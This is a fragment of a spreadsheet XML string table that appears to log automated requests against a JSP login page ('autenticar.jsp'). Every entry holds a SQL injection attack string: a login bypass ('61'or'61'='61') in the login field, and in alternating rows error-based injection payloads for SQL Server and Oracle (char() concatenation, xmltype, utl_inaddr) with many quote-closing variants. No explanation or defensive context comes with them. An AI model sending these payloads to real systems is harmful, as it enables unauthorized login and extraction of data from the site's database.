    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7936</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3124'or9974in((char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(9974=9974)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and'avhe'='avhe</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1871</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3070')or9974in((char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(9974=9974)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and('lxph'like'lxph</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3680</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1151'))or9974in((char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(9974=9974)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and(('smcy'like'smcy</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-5671</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-6310')))or9974in((char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(9974=9974)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and((('gpgl'like'gpgl</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-4057</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7037'or9974in((char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(9974=9974)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and'tkcq'like'tkcq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7436</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-4129")or9974in((char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(9974=9974)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and("yurd"="yurd</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-4126</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-453"))or9974in((char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(9974=9974)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and(("rtnm"="rtnm</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2139</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7933")))or9974in((char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(9974=9974)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and((("zpbp"="zpbp</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-497</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-4476"or9974in((char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(9974=9974)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and"nykc"="nykc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7975</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7443")or9974in((char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(9974=9974)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and("tgox"like"tgox</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-236</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3722"))or9974in((char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(9974=9974)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and(("ouwr"like"ouwr</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-8920</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1162")))or9974in((char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(9974=9974)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and((("uxch"like"uxch</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-5358</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7192"or9974in((char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(9974=9974)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and"uabn"like"uabn</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-5893</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-6291)or5430=(selectupper(xmltype(chr(60)||chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(replace((select(casewhen(5430=5430)then1else0end)fromdual),chr(32),chr(58)||chr(108)||chr(58)))||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)||chr(62)))fromdual)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-4209</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-9757')or5430=(selectupper(xmltype(chr(60)||chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(replace((select(casewhen(5430=5430)then1else0end)fromdual),chr(32),chr(58)||chr(108)||chr(58)))||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)||chr(62)))fromdual)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-4502</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-9948'or5430=(selectupper(xmltype(chr(60)||chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(replace((select(casewhen(5430=5430)then1else0end)fromdual),chr(32),chr(58)||chr(108)||chr(58)))||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)||chr(62)))fromdual)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7325</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-6361"or5430=(selectupper(xmltype(chr(60)||chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(replace((select(casewhen(5430=5430)then1else0end)fromdual),chr(32),chr(58)||chr(108)||chr(58)))||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)||chr(62)))fromdual)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-8781</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-9778)or5430=(selectupper(xmltype(chr(60)||chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(replace((select(casewhen(5430=5430)then1else0end)fromdual),chr(32),chr(58)||chr(108)||chr(58)))||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)||chr(62)))fromdual)and(1845=1845</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1963</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-6706))or5430=(selectupper(xmltype(chr(60)||chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(replace((select(casewhen(5430=5430)then1else0end)fromdual),chr(32),chr(58)||chr(108)||chr(58)))||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)||chr(62)))fromdual)and((5623=5623</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-8162</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-6582)))or5430=(selectupper(xmltype(chr(60)||chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(replace((select(casewhen(5430=5430)then1else0end)fromdual),chr(32),chr(58)||chr(108)||chr(58)))||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)||chr(62)))fromdual)and(((5800=5800</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-8191</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7367or5430=(selectupper(xmltype(chr(60)||chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(replace((select(casewhen(5430=5430)then1else0end)fromdual),chr(32),chr(58)||chr(108)||chr(58)))||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)||chr(62)))fromdual)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2896</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-845')or5430=(selectupper(xmltype(chr(60)||chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(replace((select(casewhen(5430=5430)then1else0end)fromdual),chr(32),chr(58)||chr(108)||chr(58)))||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)||chr(62)))fromdual)and('akui'='akui</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-9266</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-4974'))or5430=(selectupper(xmltype(chr(60)||chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(replace((select(casewhen(5430=5430)then1else0end)fromdual),chr(32),chr(58)||chr(108)||chr(58)))||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)||chr(62)))fromdual)and(('hbcs'='hbcs</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-9422</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-9305')))or5430=(selectupper(xmltype(chr(60)||chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(replace((select(casewhen(5430=5430)then1else0end)fromdual),chr(32),chr(58)||chr(108)||chr(58)))||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)||chr(62)))fromdual)and((('fcli'='fcli</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7272</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3294'or5430=(selectupper(xmltype(chr(60)||chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(replace((select(casewhen(5430=5430)then1else0end)fromdual),chr(32),chr(58)||chr(108)||chr(58)))||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)||chr(62)))fromdual)and'zdre'='zdre</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-9832</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2755')or5430=(selectupper(xmltype(chr(60)||chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(replace((select(casewhen(5430=5430)then1else0end)fromdual),chr(32),chr(58)||chr(108)||chr(58)))||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)||chr(62)))fromdual)and('quum'like'quum</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-996</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7928'))or5430=(selectupper(xmltype(chr(60)||chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(replace((select(casewhen(5430=5430)then1else0end)fromdual),chr(32),chr(58)||chr(108)||chr(58)))||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)||chr(62)))fromdual)and(('uigp'like'uigp</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1055</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3901')))or5430=(selectupper(xmltype(chr(60)||chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(replace((select(casewhen(5430=5430)then1else0end)fromdual),chr(32),chr(58)||chr(108)||chr(58)))||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)||chr(62)))fromdual)and((('zdkq'like'zdkq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-8245</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-746'or5430=(selectupper(xmltype(chr(60)||chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(replace((select(casewhen(5430=5430)then1else0end)fromdual),chr(32),chr(58)||chr(108)||chr(58)))||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)||chr(62)))fromdual)and'tobu'like'tobu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-8980</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-5971")or5430=(selectupper(xmltype(chr(60)||chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(replace((select(casewhen(5430=5430)then1else0end)fromdual),chr(32),chr(58)||chr(108)||chr(58)))||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)||chr(62)))fromdual)and("zwfu"="zwfu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3542</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-63"))or5430=(selectupper(xmltype(chr(60)||chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(replace((select(casewhen(5430=5430)then1else0end)fromdual),chr(32),chr(58)||chr(108)||chr(58)))||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)||chr(62)))fromdual)and(("pjfn"="pjfn</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1018</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1160")))or5430=(selectupper(xmltype(chr(60)||chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(replace((select(casewhen(5430=5430)then1else0end)fromdual),chr(32),chr(58)||chr(108)||chr(58)))||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)||chr(62)))fromdual)and((("inaa"="inaa</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-8537</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-8532"or5430=(selectupper(xmltype(chr(60)||chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(replace((select(casewhen(5430=5430)then1else0end)fromdual),chr(32),chr(58)||chr(108)||chr(58)))||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)||chr(62)))fromdual)and"nsfb"="nsfb</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2620</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-5935")or5430=(selectupper(xmltype(chr(60)||chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(replace((select(casewhen(5430=5430)then1else0end)fromdual),chr(32),chr(58)||chr(108)||chr(58)))||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)||chr(62)))fromdual)and("twer"like"twer</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-6284</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-9426"))or5430=(selectupper(xmltype(chr(60)||chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(replace((select(casewhen(5430=5430)then1else0end)fromdual),chr(32),chr(58)||chr(108)||chr(58)))||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)||chr(62)))fromdual)and(("phee"like"phee</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-8828</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1424")))or5430=(selectupper(xmltype(chr(60)||chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(replace((select(casewhen(5430=5430)then1else0end)fromdual),chr(32),chr(58)||chr(108)||chr(58)))||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)||chr(62)))fromdual)and((("zjla"like"zjla</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-5532</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-4807"or5430=(selectupper(xmltype(chr(60)||chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(replace((select(casewhen(5430=5430)then1else0end)fromdual),chr(32),chr(58)||chr(108)||chr(58)))||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)||chr(62)))fromdual)and"svyd"like"svyd</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3453</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-6061)or3342=utl_inaddr.get_host_address(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(3342=3342)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58))</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-5562</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-4980')or3342=utl_inaddr.get_host_address(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(3342=3342)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58))</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-4242</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3271'or3342=utl_inaddr.get_host_address(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(3342=3342)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58))</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2879</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2857"or3342=utl_inaddr.get_host_address(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(3342=3342)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58))</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-5212</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-5455)or3342=utl_inaddr.get_host_address(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(3342=3342)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58))and(4104=4104</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7580</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3593))or3342=utl_inaddr.get_host_address(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(3342=3342)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58))and((1776=1776</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3992</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-4261)))or3342=utl_inaddr.get_host_address(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(3342=3342)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58))and(((5431=5431</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-9338</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-6475or3342=utl_inaddr.get_host_address(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(3342=3342)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58))</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2040</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3437')or3342=utl_inaddr.get_host_address(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(3342=3342)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58))and('rspc'='rspc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-6694</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-9199'))or3342=utl_inaddr.get_host_address(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(3342=3342)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58))and(('rvpu'='rvpu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2572</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-854')))or3342=utl_inaddr.get_host_address(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(3342=3342)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58))and((('diyy'='diyy</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-5283</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-6815'or3342=utl_inaddr.get_host_address(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(3342=3342)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58))and'sewe'='sewe</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-9913</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1293')or3342=utl_inaddr.get_host_address(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(3342=3342)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58))and('wbqc'like'wbqc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-8548</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-130'))or3342=utl_inaddr.get_host_address(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(3342=3342)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58))and(('xqfu'like'xqfu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-8716</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2482')))or3342=utl_inaddr.get_host_address(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(3342=3342)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58))and((('tgkx'like'tgkx</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7965</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7231'or3342=utl_inaddr.get_host_address(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(3342=3342)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58))and'sbds'like'sbds</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-5454</t>
  </si>
  <si>
